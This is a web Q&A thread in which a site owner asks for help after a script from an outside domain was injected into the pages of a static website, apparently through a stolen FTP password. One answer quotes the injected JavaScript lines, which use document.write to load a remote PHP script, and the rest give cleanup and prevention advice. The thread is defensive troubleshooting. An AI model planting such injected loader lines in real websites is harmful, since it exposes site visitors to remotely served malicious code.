# Mysterious url in our html website

Tags: html, security, web, code-injection

The home-page of our static html website http://www.iffort.com is transferring data from a mysterious website rawalrohi.com. You can check this by going to iffort.com and noticing the footer there. It says transferring data from rawalrohi.com.

From our side we did the following things to rectify the issue

a.) Analyze the source-code of all pages. We checked the code and found out that a script src=http://rawalrohi.com/images/ART.php was inserted in all pages. We removed this script from all the ‘html’ pages of the website

b.)Next we spoke to the hosting company, they said they can provide us a back up of the site. We have the backup but haven’t used it to restore the site.

c.)Lastly, we have changed the FTP password because we were told that somebody could have hacked our FTP password.

Despite doing this the home-page still says transferring data from rawalrohi.com. The view source doesn’t reveal the URL. This is slowing down our website.

Any help is greatly appreciated.

Comment: This is more for serverfault.

Answer (score 3):

Your page references a file called "js/hyperlinked_Images.js"
Have a look at this file, right near the bottom:

```
...
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
document.write('<script src=http://rawalrohi.com/images/ART.php ><\/script>');
```

Now if you'll excuse me, I'm go to run a quick AV scan on my system ;)

Comment: Thanks for the reply. Are we supposed to remove that as well? I mean the js file?

Comment: Yes you probably should remove that, unless you know why it's there.

Comment: Just removed the last 3 lines in that code. Uploaded the new file. Anything else which needs to be edited?

Comment: I'm not sure, but it sounds like you need to do a very detailed audit of the files on your server. Maybe search all files in your hosting directory for "rawalrohi" and clean them up.
The other option would be to just reformat your server and reinstall your server software and reinstall the site, assuming your backup of the site is not tainted. The main problem with this approach is the downtime. Also, not all hosting companies will let you do that (or do it for you).

Comment: Yeah you are right a lengthy process. Right now I searched hosting directory for rawalrohi and found nothing.

Comment: Btw they provided backup of 15th October.

Answer (score 1):

make sure you don't use one FTP account for everything, control the FTP user control, it will help you to manage your website.

Comment: Hi Shiro - Sorry can you please elaborate this?

Answer (score 1):

I've seen similar behaviour a while back. In that specific case, the ftp-password was compromised: it was read from the clients desktop PC by malware that collected stored ftp passwords.

We found this out only after the password was changed and compromised again within a few days.

So make sure you scan all machines that 'know' the ftp password with a decent AV-scanner.

Answer (score 0):

I just recently saw this on a clients website, a different url but same type of code injection  was in all of their files.  To fix the problem, I download the site and I used Visual Studio to do a sitewide "find & replace" on the string.  This solved the problem for me.  I suggest you do something similar for all files, you might have missed one.  My clients site had html/htm/aspx files that were all infected, ISP made the same statement that the FTP password was probably compromised...

Comment: Thanks Zachari. The hosting companies are pretty reckless in their behavior. Will see what we can do, will perhaps download all the code.

Answer (score 0):

Make sure you on your antivirus. Whenever the your website loading funny external script like adware, spyware, your antivirus will alert you.

Comment: Using Mcafee antivirus. it is always on. Never alerted me about anything suspicious :(

Comment: Antivirus apps will never catch everything. It's always possible for some things to get through them.

Answer (score 0):

I didn't scan your site, but if you're using any standard software on your website, like: WordPress, Drupal, Joomla, etc. then you need to keep that updated at all times. Subscribe to their security alerts and whenever you see an update, drop everything you're doing and update.

Hackers are constantly scanning the internet for vulnerable websites. It only takes them a fraction of a second on a vulnerable site to infect it.

Also, keep all the plugins, add-ons, components, modules, contributions, etc. updated as well.

Otherwise, you'll be cleaning this over and over again.